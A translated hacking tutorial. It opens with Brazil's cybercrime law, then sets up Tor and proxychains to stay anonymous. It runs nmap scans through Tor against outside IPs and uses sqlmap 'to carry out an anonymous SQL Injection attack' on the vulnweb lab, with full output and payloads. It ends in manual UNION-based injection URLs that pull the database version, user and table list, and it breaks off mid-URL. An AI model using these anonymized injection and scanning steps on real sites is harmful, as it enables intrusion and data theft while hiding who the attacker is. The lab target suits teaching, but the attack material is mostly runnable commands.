Nicknamed the Carolina Dieckmann Law, the Cybercrime Law (12.737/2012) defines as crimes a number of offences committed through electronic means, such as breaking into computers, violating user data or "taking down" websites.
The bill that gave rise to the law (PLC 35/2012) was drafted at the time when intimate photos of the actress Carolina Dieckmann were copied from her computer and spread across the world wide web. The text had been demanded by the financial sector, given the number of scams carried out over the internet.
It came into force on 02/04/2013.
Intrusion into a computing device:
Punishable by imprisonment ranging from 3 months to one year, plus a fine.
Obtaining, through the intrusion, the content of "private electronic communications, commercial or industrial secrets, confidential information":
A sentence of 6 months to 2 years in prison, plus a fine. The same applies if the offence involves the disclosure, sale or transmission to third parties, whether by sale or free of charge, of the material obtained through the intrusion.
The law also provides for the penalties to be increased by one sixth to one third if the intrusion causes economic loss, and by one to two thirds "if there is disclosure, sale or transmission to a third party, under any title, of the data or information obtained".
The penalties may also be increased by one third to one half if the crime is committed against the President of the Republic, the presidents of the Supreme Federal Court, the Chamber of Deputies, the Senate, state legislative assemblies and chambers, or municipal councils, or the top officials "of the direct and indirect federal, state, municipal or Federal District administration".
02 - Proxychains
Tor is free and open-source software for protecting personal anonymity while browsing the Internet and in other online activities, protecting against censorship and protecting personal privacy. Most GNU/Linux distributions provide Tor packages, although there are versions for other operating systems such as Windows and Mac OS.
The Tor network is a network of HTTP tunnels (with TLS) overlaid on the Internet, in which the network's routers are ordinary users' computers running a program and with (only) web access. The project's main goal is to guarantee the anonymity of the user accessing the web.
The Tor client is a program that must be installed on the computer and acts as a SOCKS5 proxy for it. It provides a bind, usually on the machine's local port 9050. Programs must then be configured to use a SOCKS5 proxy server and pointed at the localhost address (127.0.0.1).
Follow the steps below to install and configure it:
Install Tor from the Tor Project repository, because it is always up to date.
Copy and paste the two lines below into the terminal:
echo 'deb https://deb.torproject.org/torproject.org stretch main
deb-src https://deb.torproject.org/torproject.org stretch main' > /etc/apt/sources.list.d/tor.list
Then, download the Tor Project package signing key and import it into your APT keyring.
wget -O- 'https://pgp.mit.edu/pks/lookup?op=get&search=0xA3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89' | sudo apt-key add -
-------
apt-get update
apt-get install tor torsocks polipo privoxy proxychains
-------
tor &
Mar 15 14:22:56.060 [notice] Tor 0.2.9.9 (git-1d8323c042800718) running on Linux with Libevent 2.0.21-stable, OpenSSL 1.1.0c and Zlib 1.2.8.
Mar 15 14:22:56.061 [notice] Tor can't help you if you use it wrong! Learn how to be safe at https://www.torproject.org/download/download#warning
Mar 15 14:22:56.062 [notice] Read configuration file "/etc/tor/torrc".
Mar 15 14:22:56.069 [notice] Opening Socks listener on 127.0.0.1:9050
Mar 15 14:22:56.000 [notice] Parsing GEOIP IPv4 file /usr/share/tor/geoip.
Mar 15 14:22:56.000 [notice] Parsing GEOIP IPv6 file /usr/share/tor/geoip6.
Mar 15 14:22:56.000 [warn] You are running Tor as root. You don't need to, and you probably shouldn't.
Mar 15 14:22:56.000 [notice] Bootstrapped 0%: Starting
Mar 15 14:22:57.000 [notice] Bootstrapped 5%: Connecting to directory server
Mar 15 14:22:57.000 [notice] Bootstrapped 10%: Finishing handshake with directory server
Mar 15 14:22:57.000 [notice] Bootstrapped 15%: Establishing an encrypted directory connection
Mar 15 14:22:58.000 [notice] Bootstrapped 20%: Asking for networkstatus consensus
Mar 15 14:22:58.000 [notice] Bootstrapped 25%: Loading networkstatus consensus
Mar 15 14:22:59.000 [notice] I learned some more directory information, but not enough to build a circuit: We have no usable consensus.
Mar 15 14:23:00.000 [notice] Bootstrapped 40%: Loading authority key certs
Mar 15 14:23:00.000 [notice] Bootstrapped 45%: Asking for relay descriptors
Mar 15 14:23:00.000 [notice] I learned some more directory information, but not enough to build a circuit: We need more microdescriptors: we have 0/7344, and can only build 0% of likely paths. (We have 0% of guards bw, 0% of midpoint bw, and 0% of exit bw = 0% of path bw.)
Mar 15 14:23:01.000 [notice] Bootstrapped 50%: Loading relay descriptors
Mar 15 14:23:03.000 [notice] Bootstrapped 55%: Loading relay descriptors
Mar 15 14:23:03.000 [notice] Bootstrapped 61%: Loading relay descriptors
Mar 15 14:23:03.000 [notice] Bootstrapped 70%: Loading relay descriptors
Mar 15 14:23:03.000 [notice] Bootstrapped 75%: Loading relay descriptors
Mar 15 14:23:04.000 [notice] Bootstrapped 80%: Connecting to the Tor network
Mar 15 14:23:05.000 [notice] Bootstrapped 90%: Establishing a Tor circuit
Mar 15 14:23:06.000 [notice] Tor has successfully opened a circuit. Looks like client functionality is working.
Mar 15 14:23:06.000 [notice] Bootstrapped 100%: Done
-------
tor --verify-config
Dec 10 11:29:52.237 [notice] Tor 0.3.4.9 (git-de9ea9f0dfc5ecae) running on Linux with Libevent 2.1.8-stable, OpenSSL 1.1.1a, Zlib 1.2.11, Liblzma 5.2.2, and Libzstd 1.3.5.
Dec 10 11:29:52.237 [notice] Tor can't help you if you use it wrong! Learn how to be safe at https://www.torproject.org/download/download#warning
Dec 10 11:29:52.238 [notice] Read configuration file "/etc/tor/torrc".
Dec 10 11:29:52.241 [warn] You are running Tor as root. You don't need to, and you probably shouldn't.
Configuration was valid
-------
tor -f /path/to/your/own/torrc
Dec 10 11:30:45.233 [notice] Tor 0.3.4.9 (git-de9ea9f0dfc5ecae) running on Linux with Libevent 2.1.8-stable, OpenSSL 1.1.1a, Zlib 1.2.11, Liblzma 5.2.2, and Libzstd 1.3.5.
Dec 10 11:30:45.233 [notice] Tor can't help you if you use it wrong! Learn how to be safe at https://www.torproject.org/download/download#warning
Dec 10 11:30:45.233 [warn] Unable to open configuration file "/path/to/your/own/torrc".
Dec 10 11:30:45.234 [err] Reading config failed--see warnings above.
-------
netstat -tanp | grep tor
tcp 0 0 127.0.0.1:9050 0.0.0.0:* LISTEN 9730/tor
tcp 0 0 192.168.2.199:52786 134.119.3.164:9001 ESTABLISHED 9730/tor
tcp 0 0 192.168.2.199:60570 163.172.185.132:443 ESTABLISHED 9730/tor
tcp 0 0 192.168.2.199:56166 82.196.12.245:443 ESTABLISHED 9730/tor
tcp 0 0 192.168.2.199:37466 139.59.210.164:443 ESTABLISHED 9730/tor
tcp 0 0 192.168.2.199:37472 198.96.155.3:5001 ESTABLISHED 9730/tor
tcp 0 0 192.168.2.199:48184 193.171.202.146:9001 ESTABLISHED 9730/tor
-------
netstat -antlp | grep LISTEN
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 830/sshd
tcp 0 0 127.0.0.1:9050 0.0.0.0:* LISTEN 3166/tor
tcp 0 0 127.0.0.1:8123 0.0.0.0:* LISTEN 2135/polipo
tcp6 0 0 :::22 :::* LISTEN 830/sshd
-------
netstat -tanp | grep tor
tcp 0 0 127.0.0.1:9050 0.0.0.0:* LISTEN 3166/tor
tcp 0 0 192.168.142.129:49378 193.70.43.76:9001 ESTABLISHED 3166/tor
tcp 0 0 192.168.142.129:36678 194.88.105.97:443 ESTABLISHED 3166/tor
tcp 0 0 192.168.142.129:44512 144.76.236.14:443 ESTABLISHED 3166/tor
tcp 0 0 192.168.142.129:49972 185.100.86.128:9001 ESTABLISHED 3166/tor
tcp 0 0 192.168.142.129:50070 176.10.104.240:443 ESTABLISHED 3166/tor
-------
nano /etc/proxychains.conf
dynamic_chain
strict_chain
random_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
socks4 127.0.0.1 9050
socks5 127.0.0.1 9050
Ctrl+X, then Y, then Enter (save and exit the file). Only one chain mode (dynamic_chain, strict_chain or random_chain) should be left uncommented; the others stay prefixed with #. The socks4/socks5 entries point at Tor's local listener on 127.0.0.1:9050.
-------
service tor restart
-------
service tor status
● tor.service - Anonymizing overlay network for TCP (multi-instance-master)
Loaded: loaded (/lib/systemd/system/tor.service; disabled; vendor preset: disabled)
Active: active (exited) since Sat 2018-12-01 11:50:09 EST; 2min 4s ago
Process: 2068 ExecStart=/bin/true (code=exited, status=0/SUCCESS)
Main PID: 2068 (code=exited, status=0/SUCCESS)
Dec 01 11:50:09 kali systemd[1]: Starting Anonymizing overlay network for TCP (multi-instance-master)...
Dec 01 11:50:09 kali systemd[1]: Started Anonymizing overlay network for TCP (multi-instance-master).
-------
Stopping the processes.
service privoxy stop && service tor stop
-------
To stay anonymous, start the processes below.
service privoxy start && service tor start
-------
Updating the system.
apt-get update
-------
Showing the Tor status.
service tor status
tor.service - LSB: Starts The Onion Router daemon processes
Loaded: loaded (/etc/init.d/tor)
Active: active (running) since Mon 2016-06-13 09:21:08 EDT; 37min ago
Process: 1859 ExecStop=/etc/init.d/tor stop (code=exited, status=0/SUCCESS)
Process: 1870 ExecStart=/etc/init.d/tor start (code=exited, status=0/SUCCESS)
CGroup: /system.slice/tor.service
1881 /usr/bin/tor --defaults-torrc /usr/share/tor/tor-service-defaults-torrc --hush
Jun 13 09:21:08 kali tor[1870]: Starting tor daemon...done.
-------
Checking the listeners.
netstat -ant | grep 8118
tcp 0 0 127.0.0.1:8118 0.0.0.0:* LISTEN
tcp6 0 0 ::1:8118 :::* LISTEN
-------
netstat -na | grep 9050
tcp 0 0 127.0.0.1:9050 0.0.0.0:* LISTEN
-------
netstat -tanp | grep tor
tcp 0 0 127.0.0.1:9050 0.0.0.0:* LISTEN 1881/tor
tcp 0 0 192.168.1.102:38764 91.109.29.120:443 ESTABLISHED 1881/tor
-------
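The netstat checks above verify two things by eye: that Tor (9050), Privoxy (8118) and Polipo (8123) listen on loopback only, and that the tor process has outbound relay connections. The script below, an added example that is not part of the original notes, automates both checks over netstat -tanp output (the sample lines are constructed here, with Privoxy deliberately bound to 0.0.0.0 to show what the check catches).

```python
"""Check `netstat -tanp` output for the Tor/Privoxy/Polipo listeners.

Added example, not part of the original notes. Sample input is constructed.
Reports proxy listeners exposed beyond loopback (anyone on the LAN could then
route traffic through this host's Tor) and whether tor has a live circuit.
"""
from __future__ import annotations

import ipaddress
from dataclasses import dataclass

# Local proxy ports the notes expect on 127.0.0.1: Tor SOCKS, Privoxy, Polipo.
PROXY_PORTS = {9050: "tor-socks", 8118: "privoxy", 8123: "polipo"}


@dataclass
class Sock:
    proto: str
    local_ip: str
    local_port: int
    remote: str
    state: str
    program: str  # "pid/name", or "" when netstat could not read it


def _split_addr(addr: str) -> tuple[str, int]:
    """Split '127.0.0.1:9050' or ':::22' into (ip, port); port '*' becomes 0."""
    host, _, port = addr.rpartition(":")
    return host, (0 if port == "*" else int(port))


def parse_netstat(text: str) -> list[Sock]:
    """Parse lines of `netstat -tanp`; header and non-tcp lines are skipped."""
    socks = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 6 or not parts[0].startswith("tcp"):
            continue
        lip, lport = _split_addr(parts[3])
        program = parts[6] if len(parts) > 6 else ""
        socks.append(Sock(parts[0], lip, lport, parts[4], parts[5], program))
    return socks


def _is_loopback(ip: str) -> bool:
    """True for 127.x and ::1; '0.0.0.0' and '::' (all interfaces) are not."""
    if ip in ("", "*", "0.0.0.0", "::"):
        return False
    try:
        return ipaddress.ip_address(ip).is_loopback
    except ValueError:
        return False


def exposed_proxy_listeners(socks: list[Sock]) -> dict[str, str]:
    """Proxy listeners NOT bound to loopback, e.g. {'privoxy': '0.0.0.0'}."""
    return {
        PROXY_PORTS[s.local_port]: s.local_ip
        for s in socks
        if s.state == "LISTEN"
        and s.local_port in PROXY_PORTS
        and not _is_loopback(s.local_ip)
    }


def tor_has_circuit(socks: list[Sock]) -> bool:
    """True when tor shows at least one ESTABLISHED outbound (non-loopback) socket."""
    return any(
        s.state == "ESTABLISHED"
        and s.program.endswith("/tor")
        and not _is_loopback(s.local_ip)
        for s in socks
    )


# Constructed sample in the shape of the netstat output shown in the notes,
# but with privoxy bound to 0.0.0.0 instead of 127.0.0.1.
SAMPLE = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 1215/sshd
tcp 0 0 127.0.0.1:9050 0.0.0.0:* LISTEN 1881/tor
tcp 0 0 0.0.0.0:8118 0.0.0.0:* LISTEN 1854/privoxy
tcp 0 0 192.168.1.102:38814 91.109.29.120:443 ESTABLISHED 1881/tor
tcp6 0 0 ::1:8123 :::* LISTEN 2135/polipo
tcp6 0 0 :::22 :::* LISTEN 1215/sshd
"""

if __name__ == "__main__":
    socks = parse_netstat(SAMPLE)
    print("exposed proxies:", exposed_proxy_listeners(socks))  # {'privoxy': '0.0.0.0'}
    print("tor circuit up:", tor_has_circuit(socks))            # True
```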
tail -f /var/log/tor/log
Jun 13 16:50:10.000 [notice] Parsing GEOIP IPv4 file /usr/share/tor/geoip.
Jun 13 16:50:10.000 [notice] Parsing GEOIP IPv6 file /usr/share/tor/geoip6.
Jun 13 16:50:10.000 [notice] Bootstrapped 0%: Starting
Jun 13 16:50:10.000 [notice] Bootstrapped 5%: Connecting to directory server
Jun 13 16:50:10.000 [notice] We now have enough directory information to build circuits.
Jun 13 16:50:10.000 [notice] Bootstrapped 80%: Connecting to the Tor network
Jun 13 16:50:11.000 [notice] Bootstrapped 85%: Finishing handshake with first hop
Jun 13 16:50:11.000 [notice] Bootstrapped 90%: Establishing a Tor circuit
Jun 13 16:50:13.000 [notice] Tor has successfully opened a circuit. Looks like client functionality is working.
Jun 13 16:50:13.000 [notice] Bootstrapped 100%: Done
-------
tor
Jun 13 16:45:51.026 [notice] Tor v0.2.5.12 (git-3731dd5c3071dcba) running on Linux with Libevent 2.0.21-stable, OpenSSL 1.0.1k and Zlib 1.2.8.
Jun 13 16:45:51.026 [notice] Tor can't help you if you use it wrong! Learn how to be safe at https://www.torproject.org/download/download#warning
Jun 13 16:45:51.027 [notice] Read configuration file "/etc/tor/torrc".
Jun 13 16:45:51.029 [notice] Opening Socks listener on 127.0.0.1:9050
Jun 13 16:45:51.029 [warn] Could not bind to 127.0.0.1:9050: Address already in use. Is Tor already running?
Jun 13 16:45:51.029 [notice] Opening DNS listener on 127.0.0.1:53
Jun 13 16:45:51.029 [notice] Closing partially-constructed DNS listener on 127.0.0.1:53
Jun 13 16:45:51.029 [warn] Failed to parse/validate config: Failed to bind one of the listener ports.
Jun 13 16:45:51.030 [err] Reading config failed--see warnings above.
-------
tor --verify-config
Jun 13 17:02:51.335 [notice] Tor v0.2.5.12 (git-3731dd5c3071dcba) running on Linux with Libevent 2.0.21-stable, OpenSSL 1.0.1k and Zlib 1.2.8.
Jun 13 17:02:51.336 [notice] Tor can't help you if you use it wrong! Learn how to be safe at https://www.torproject.org/download/download#warning
Jun 13 17:02:51.336 [notice] Read configuration file "/etc/tor/torrc".
Jun 13 17:02:51.339 [warn] You are running Tor as root. You don't need to, and you probably shouldn't.
Configuration was valid
-------
tor -f /path/to/your/own/torrc
Jun 13 17:04:41.936 [notice] Tor v0.2.5.12 (git-3731dd5c3071dcba) running on Linux with Libevent 2.0.21-stable, OpenSSL 1.0.1k and Zlib 1.2.8.
Jun 13 17:04:41.936 [notice] Tor can't help you if you use it wrong! Learn how to be safe at https://www.torproject.org/download/download#warning
Jun 13 17:04:41.936 [warn] Unable to open configuration file "/path/to/your/own/torrc".
Jun 13 17:04:41.936 [err] Reading config failed--see warnings above.
-------
Let's check what our server's public IP is (with the HTTP proxy pointed at Privoxy).
export http_proxy="http://localhost:8118"
-------
curl ipecho.net/plain ; echo
198.50.200.135
-------
Let's see where this IP comes from.
whois 198.50.200.135
#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/whois_tou.html
#
# If you see inaccuracies in the results, please report at
# https://www.arin.net/public/whoisinaccuracy/index.xhtml
#
NetRange: 198.50.128.0 - 198.50.255.255
CIDR: 198.50.128.0/17
NetName: OVH-ARIN-6
NetHandle: NET-198-50-128-0-1
Parent: NET198 (NET-198-0-0-0-0)
NetType: Direct Allocation
OriginAS: AS16276
Organization: OVH Hosting, Inc. (HO-2)
RegDate: 2013-03-07
Updated: 2013-03-07
Ref: https://whois.arin.net/rest/net/NET-198-50-128-0-1
OrgName: OVH Hosting, Inc.
OrgId: HO-2
Address: 800-1801 McGill College
City: Montreal
StateProv: QC
PostalCode: H3A 2N4
Country: CA
RegDate: 2011-06-22
Updated: 2016-03-25
Ref: https://whois.arin.net/rest/org/HO-2
-------
Using proxychains with nmap.
proxychains nmap -sS ip_x
-------
proxychains nmap -sT -PN -n -sV -p 80,443,21,22 ip_x
-------
proxychains nmap -Pn -sT -n -sV -p 21,22,23,53,80,110,139,143,443 ip_x
-------
nmap -Pn -sT -p 80,443,21,22,23 80.14.163.161
Starting Nmap 7.00 ( https://nmap.org ) at 2016-06-13 15:41 EDT
Nmap scan report for LStLambert-656-1-112-161.w80-14.abo.wanadoo.fr (80.14.163.161)
Host is up.
PORT STATE SERVICE
21/tcp filtered ftp
22/tcp filtered ssh
23/tcp filtered telnet
80/tcp filtered http
443/tcp filtered https
Nmap done: 1 IP address (1 host up) scanned in 3.45 seconds
-------
proxychains nmap -sV -Pn -p80,22,135 8.8.8.8
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.00 ( https://nmap.org ) at 2016-06-13 14:14 EDT
Nmap scan report for google-public-dns-a.google.com (8.8.8.8)
Host is up (0.038s latency).
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp filtered http
135/tcp filtered msrpc
-------
netstat -plant
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 1215/sshd
tcp 0 0 127.0.0.1:9050 0.0.0.0:* LISTEN 1881/tor
tcp 0 0 192.168.1.102:38814 91.109.29.120:443 ESTABLISHED 1881/tor
tcp 0 252 192.168.1.102:22 192.168.1.100:50185 ESTABLISHED 1536/1
tcp6 0 0 ::1:8118 :::* LISTEN 1854/privoxy
tcp6 0 0 :::22 :::* LISTEN 1215/sshd
-------
The IP above is Kali's = 192.168.1.102
Checking the IP of the Tor relay it is connected to.
whois 91.109.29.120 | grep address
address: Kleyer Strasse 79 / Tor 13
address: 60326
address: Frankfurt
address: GERMANY
address: Kleyerstrasse 79 / Tor 13
address: 60326 Frankfurt am Main
address: Germany
-------
Let's use proxychains with sqlmap to carry out an anonymous SQL Injection attack (the command below is a single line).
proxychains sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --flush-session --time-sec=5 --tor-type=socks5 --tor-port=9050
ProxyChains-3.1 (http://proxychains.sf.net)
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-201603300a89}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable local,
state and federal laws. Developers assume no liability and are not responsible for any
misuse or damage caused by this program
[*] starting at 14:26:21
|DNS-request| testphp.vulnweb.com
|S-chain|-<>-127.0.0.1:9050-<><>-4.2.2.2:53-<><>-OK
|DNS-response| testphp.vulnweb.com is 176.28.50.165
[14:26:22] [INFO] testing connection to the target URL
|DNS-request| testphp.vulnweb.com
|S-chain|-<>-127.0.0.1:9050-<><>-4.2.2.2:53-<><>-OK
|DNS-response| testphp.vulnweb.com is 176.28.50.165
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-|S-chain|-<>-127.0.0.1:9050-<><>-
176.28.50.165:80-<><>-OK<><>-OK
[14:26:25] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
<><>-OK
[14:26:26] [INFO] testing if the target URL is stable<><>-OK
[14:26:26] [INFO] target URL is stable8.50.165:80-
[14:26:26] [INFO] testing if GET parameter 'artist' is dynamic <><>-OK
[14:26:27] [INFO] confirming that GET parameter 'artist' is dynamic <><>-OK
[14:26:28] [INFO] GET parameter 'artist' is dynamic <><>-OK
[14:26:29] [INFO] heuristic (basic) test shows that GET parameter 'artist'
might be injectable (possible DBMS: 'MySQL')<><>-OK
[14:26:30] [INFO] testing for SQL injection on GET parameter 'artist'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific
for other DBMSes? [Y/n] <><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK y
for the remaining tests, do you want to include all tests for 'MySQL' extending
provided level (1) and risk (1) values? [Y/n] y
[14:26:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
[14:26:46] [INFO] GET parameter 'artist' seems to be 'AND boolean-based blind -
WHERE or HAVING clause' injectable
[14:26:46] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause' <><>-OK
[14:26:49] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause'<><>-OK
[14:26:50] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (EXTRACTVALUE)' <><>-OK
[14:26:51] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (EXTRACTVALUE)' <><>-OK
[14:26:52] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (UPDATEXML)' <><>-OK
[14:26:52] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (UPDATEXML)' <><>-OK
[14:26:53] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (EXP)' <><>-OK
[14:26:54] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (EXP)'
<><>-OK
[14:26:54] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (BIGINT UNSIGNED)'<><>-OK
[14:26:55] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (BIGINT
UNSIGNED)' <><>-OK
[14:26:56] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause' <><>-OK
[14:26:56] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause'<><>-OK
[14:26:57] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause' <><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
[14:26:58] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
<><>-OK
[14:26:59] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' <><>-OK
[14:26:59] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
<><>-OK
[14:27:00] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
<><>-OK
[14:27:01] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)' <><>-OK
[14:27:02] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace BIGINT UNSIGNED)
' <><>-OK
[14:27:02] [INFO] testing 'MySQL inline queries'0-<><>-OK
[14:27:03] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' <><>-OK
[14:27:04] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)' <><>-OK
[14:27:05] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)' <><>-OK
[14:27:06] [INFO] testing 'MySQL > 5.0.11 stacked queries' <><>-OK
[14:27:06] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
<><>-OK
[14:27:07] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)' <><>-OK
[14:27:08] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' <><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
[14:27:20] [INFO] GET parameter 'artist' seems to be 'MySQL >= 5.0.12 AND time-based
blind (SELECT)' injectable
[14:27:20] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[14:27:20] [INFO] automatically extending ranges for UNION query injection technique
tests as there is at least one other (potential) technique found
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
[14:27:21] [INFO] ORDER BY technique seems to be usable. This should reduce the time
needed to find the right number of query columns. Automatically extending the range
for current UNION query injection technique test <><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
[14:27:23] [INFO] target URL appears to have 3 columns in query<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
[14:27:29] [INFO] GET parameter 'artist' is 'Generic UNION query (NULL) - 1 to 20
columns' injectable <><>-OK
GET parameter 'artist' is vulnerable. Do you want to keep testing the
others (if any)? [y/N] <><>-OK n
sqlmap identified the following injection point(s) with a total of 48 HTTP(s) requests:
---
Parameter: artist (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: artist=1 AND 9518=9518
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: artist=1 AND (SELECT * FROM (SELECT(SLEEP(5)))NsJj)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: artist=-7658 UNION ALL SELECT NULL,NULL,CONCAT(0x7162706a71,
0x54754c5165526665574370556d6777466a7541764c6d7643505265597a507274585973536a476359,
0x7178627671)-- -
---
[14:32:37] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0.12
[14:32:37] [INFO] fetched data logged to text files under
'/root/.sqlmap/output/testphp.vulnweb.com'
[*] shutting down at 14:32:37
03 - Firefox add-ons
Tools you should have on your computer.
The Five Greatest Firefox Tools for Hacking!
Here is a list of the greatest Firefox add-ons for Hacking:
1. HackBar – Execute commands like SQL Injection, XSS and more…
2. Live HTTP Headers – Capture all (HEADERS) of a page (used when uploading a shell….)
3. SQL Inject Me – SQL Injection commands and automation.
4. Firebug – Edit a website’s source code.
5. Tamper Data – Watch the data that your computer sends to a website and the data the website sends to you.
6. Tor Browser - Download and install Tor.
04 - Tor Browser + HackBar
Why use Tor Browser?
The Tor software protects you by bouncing your communications around a distributed
network of relays run by volunteers all around the world: it prevents somebody watching
your Internet connection from learning what sites you visit, it prevents the sites you
visit from learning your physical location, and it lets you access sites which are
blocked.
Download Tor Browser: https://www.torproject.org/download/download.html.en
The Tor Browser version used here is 4.5.3 (older); this is what lets us use HackBar.
Newer versions do not allow HackBar.
HackBar is a Firefox extension for penetration testers. Hackbar extends the address bar
of Firefox and thus provides enough space for long injection URLs during penetration
testing.
Hackbar also has some additional features including the ability to perform encryption,
encoding, decryption, POST data manipulation, inject code generation etc.
This toolbar will help you in testing sql injections, XSS holes and site security.
It is NOT a tool for executing standard exploits and it will NOT teach you how to hack
a site.
Its main purpose is to help a developer do security audits on his own code. If you know
what you're doing, this toolbar will help you do it faster.
If you want to learn to find security holes, you can also use this toolbar, but you
will probably also need a book, and a lot of Google.
Example using HackBar; notice it has many options (tools) ...
Add the "anonymoX" add-on to browse websites anonymously.
05 - Online Lab
Online labs.
06 - Manual Injection - example 1
To test for possible SQL Injection vulnerabilities we have some tools that check
whether the database is vulnerable or not.
For this lesson we will use the online lab below, created for exactly that purpose:
http://testphp.vulnweb.com
Let's start by clicking on artists below.
Click the first record, where the red arrow points.
http://testphp.vulnweb.com/artists.php
See in the image below that the record was selected.
http://testphp.vulnweb.com/artists.php?artist=1
Now let's add a single quote right after the id 1 to detect whether our target has a
SQL Injection flaw ( 1' )
http://testphp.vulnweb.com/artists.php?artist=1'
The error below indicates that this URL is vulnerable.
Now let's use ORDER BY to discover the number of columns in the query behind the page.
Keep adding the numbers sequentially, 1,2,3,4,5... until the error appears.
When the error appears, the previous number is the total number of columns returned by
the page's current query.
In the URL type the line below:
http://testphp.vulnweb.com/artists.php?artist=1 order by 1,2,3,4
Finding the database version.
In the URL bar type the line below:
http://testphp.vulnweb.com/artists.php?artist=100 union all select 1,2,version()
Finding the database user.
http://testphp.vulnweb.com/artists.php?artist=100 union all select 1,2,user()
Now let's identify which of the columns are displayed on the page.
It's important to use an ID that does not exist, so that the page shows the columns with
their corresponding numbers instead of a real record; here we guess, assuming 100 ...
http://testphp.vulnweb.com/artists.php?artist=100 union all select 1,2,3
See below: column 3 is the one displayed (the vulnerable column).
The URL below is a single line:
http://testphp.vulnweb.com/artists.php?artist=100 union all select 1,2,
group_concat(table_name) from information_schema.tables
Above, the tables were listed horizontally; below we'll see how to list them
vertically.
To list the tables in a single column we have to convert <br> to hexadecimal and
prefix the hex value with 0x: <br> = 0x3c62723e
To convert <br> to hexadecimal use the link below:
http://online-toolz.com/tools/text-hex-convertor.php
Let's list the tables vertically.
Type the line below as a single line:
http://testphp.vulnweb.com/artists.php?artist=100 union all select 1,2,
